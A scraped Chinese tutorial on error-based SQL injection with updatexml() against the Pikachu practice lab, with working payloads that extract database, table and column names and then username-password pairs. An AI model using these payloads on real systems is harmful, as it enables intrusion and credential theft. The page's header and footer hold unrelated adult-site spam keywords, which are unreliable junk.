国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

詳解SQL報錯盲注

瀏覽:61日期:2023-03-06 14:25:14
目錄
  • 一、SQL報錯函數詳解
  • 二、SQL報錯盲注payload構造
    • 1、updatexml語句構造思路
    • 2、查詢當前數據庫
    • 3、查詢表名
    • 4、查詢列名
    • 5、查詢字段名
    • 6、查詢數據

今天繼續給大家介紹Linux運維相關知識,本文主要內容是SQL報錯盲注詳解。

免責聲明:
本文所介紹的內容僅做學習交流使用,嚴禁利用文中技術進行非法行為,否則造成一切嚴重后果自負!
再次強調:嚴禁對未授權設備進行滲透測試!

一、SQL報錯函數詳解

updatexml();floor();extractvalue();等函數都可以用于構造SQL報錯函數,今天我們主要來講解使用updatexml()函數。
updatexml()函數使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數據。
該函數有一個特性,即如果XPath_string不是XPath格式的字符串,就會報錯并顯示處XPath的值,因此,我們可以利用這一特性實現SQL報錯盲注。此外,我們還可以利用updatexml()函數的特性,實現在SQL插入、刪除等語句中的SQL注入。

二、SQL報錯盲注payload構造

1、updatexml語句構造思路

updatexml()函數的構造,首先需要閉合SQL語句中的冒號、括號。其次還需要使用and或者or語句連接成一個單獨的語句,這樣即可成功執行updatexml()函數中的語句。
下面,我以皮卡丘靶場為例,來簡單介紹一下updatexml報錯注入payload的構造思路,皮卡丘靶場SQL insert/update型注入頁面如下所示:

從上圖中可以看出,該頁面功能上是提供人員的注冊,因此可以猜測其內部是insert類型的SQL語句,因此我們可以在手機、住址等列(一般不要選擇密碼,因為很多網站都會把密碼進行md5處理,從而導致我們的updatexml失效)中插入我們的updatexml語句。通過簡單的實驗可以得知,該站點的注入閉合為單引號,因此payload的構造格式為:

12" or updatexml() or"

2、查詢當前數據庫

當我們確定updatexml()函數的格式后,我們就可以寫實際的payload語句了,相關命令如下所示:

12"or updatexml(1,concat(0x7e,database(),0x7e),0) or"

從上payload可以看出,updatexml()函數有三部分組成,我們需要把我們要執行的SQL語句寫到第二部分,第二部分是一個concat()函數,之所以要拼接0x7e是因為該16進制字符是一個波浪線,也可以換成其他的字符。
該payload執行結果如下所示:

從上圖可以看出,我們當前的數據庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or "

在上述payload中,concat中間的SQL語句要用括號括起來,然后寫入正常的查詢命令即可,該payload執行結果如下所示:

從上圖可以看出,我們查詢到當前數據庫存在一個名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

5、查詢字段名

字段名查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="pikachu"),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

6、查詢數據

數據查詢的payload如下所示:

12" or updatexml(1,concat(0x7e,(select concat(username,"-",password) from users limit 0,1),0x7e),0) or "

該payload構造原理與以上類似,執行結果如下所示:

到此這篇關于SQL報錯盲注詳解的文章就介紹到這了,更多相關SQL報錯盲注內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
主站蜘蛛池模板: 日本久久久久久久久久 | 88av在线视频 | 久久99久久精品国产99热 | 亚洲午夜18 | 青草久草 | 中文字幕一二三四区2021 | 国产盗摄一区二区 | 亚洲一区国产 | 久久精品中文字幕第一页 | 日本三级成人中文字幕乱码 | 黄色美女网站免费看 | 午夜精品尤物福利视频在线 | 国产精品偷伦费观看 | 美女白浆视频 | 高清波多野结衣一区二区三区 | 欧美日本国产 | 免费久草视频 | 久久一本综合 | 一级一片免费看 | 国产成人爱片免费观看视频 | 色哟哟国产成人精品 | 手机在线精品视频每日更新 | 成人毛片免费观看视频在线 | 孕妇孕妇aaaaa级毛片视频 | 国产美女拍拍拍在线观看 | 国产精品久久久久久久久久久久 | 2022久久免费精品国产72精品 | 在线播放亚洲美女视频网站 | 欧美精品一区二区在线观看播放 | 丁香伊人五月综合激激激 | 青草青99久久99九九99九九九 | 亚洲欧美在线观看播放 | 日韩午夜免费视频 | 久久r视频 | 美女张开腿让我 | 麻豆国产96在线 | 日韩 | 一级毛片日韩a欧美 | 三级全黄a| 国产精品1区2区3区在线播放 | a级毛片在线看日本 | 亚洲成人免费视频在线 |